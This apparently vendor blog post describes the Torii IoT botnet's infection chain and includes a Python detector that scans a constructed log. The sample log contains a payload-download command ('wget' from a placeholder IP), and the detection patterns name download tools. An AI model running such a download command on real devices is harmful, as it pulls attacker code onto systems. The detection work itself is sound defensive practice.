An extremely sophisticated IoT botnet has recently been discovered and dubbed “Torii.” One of Torii malware’s many advanced capabilities is running on just about every type of smartphone, computer and tablet, with over 100 malware variants supporting over 15 different architectures.

A Torii infection starts with a telnet attack that exploits weak credentials on IoT devices, after which a shell script determines the architecture of the machine. The relevant payload is then downloaded to install Torii.
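The chain described above (telnet login, architecture check, payload download) can be hunted for in device or honeypot session logs. The following Python example is an addition to this post, not ThreatSTOP's detection logic and not taken from Torii's script; the log format, the sample lines, and the `uname`/`wget`-style command patterns are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in a hypothetical "<time> <source> <event> <detail>" format.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 198.51.100.7 LOGIN_FAIL user=root
2024-01-01T10:00:03Z 198.51.100.7 LOGIN_OK user=admin
2024-01-01T10:00:05Z 198.51.100.7 CMD uname -m
2024-01-01T10:00:09Z 198.51.100.7 CMD wget http://203.0.113.9/payload -O /tmp/x
2024-01-01T10:02:00Z 192.0.2.44 LOGIN_OK user=operator
2024-01-01T10:02:10Z 192.0.2.44 CMD uname -a
2024-01-01T10:03:00Z 192.0.2.80 LOGIN_OK user=operator
2024-01-01T10:03:05Z 192.0.2.80 CMD wget http://192.0.2.1/firmware.bin
"""

# Assumed generic indicators, not commands taken from Torii's script.
ARCH_PROBE = re.compile(r"\buname\s+-[am]\b|/proc/cpuinfo")
DOWNLOAD = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")

def find_chains(log_text):
    """Return (source, time, failed_logins, command) for each source that
    logs in, probes the CPU architecture, then downloads a file, in order."""
    stage = defaultdict(int)   # 0 = no session, 1 = logged in, 2 = arch probed
    fails = defaultdict(int)   # failed logins seen before the successful one
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue           # skip blank or malformed lines
        ts, src, event = parts[:3]
        detail = parts[3] if len(parts) > 3 else ""
        if event == "LOGIN_FAIL":
            fails[src] += 1
        elif event == "LOGIN_OK":
            stage[src] = 1
        elif event == "CMD" and stage[src] == 1 and ARCH_PROBE.search(detail):
            stage[src] = 2
        elif event == "CMD" and stage[src] == 2 and DOWNLOAD.search(detail):
            hits.append((src, ts, fails[src], detail))
            stage[src], fails[src] = 0, 0
    return hits

if __name__ == "__main__":
    for hit in find_chains(SAMPLE_LOG):
        print("possible dropper chain:", hit)
```

Only the first source is reported: the second session probes the architecture without downloading anything, and the third downloads a file without probing first.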

The malware has a variety of persistence features, making it very hard to get rid of, as well as an abundant set of exfiltration features.


ThreatSTOP protects customers against Torii. To ensure you are protected, make sure that the TS Originated - Core Threats - IPs and TS Originated - Core Threats - Domains targets are enabled.

Not sure if you're currently protected against Torii and other botnets? Try out ThreatSTOP for 14 days, free.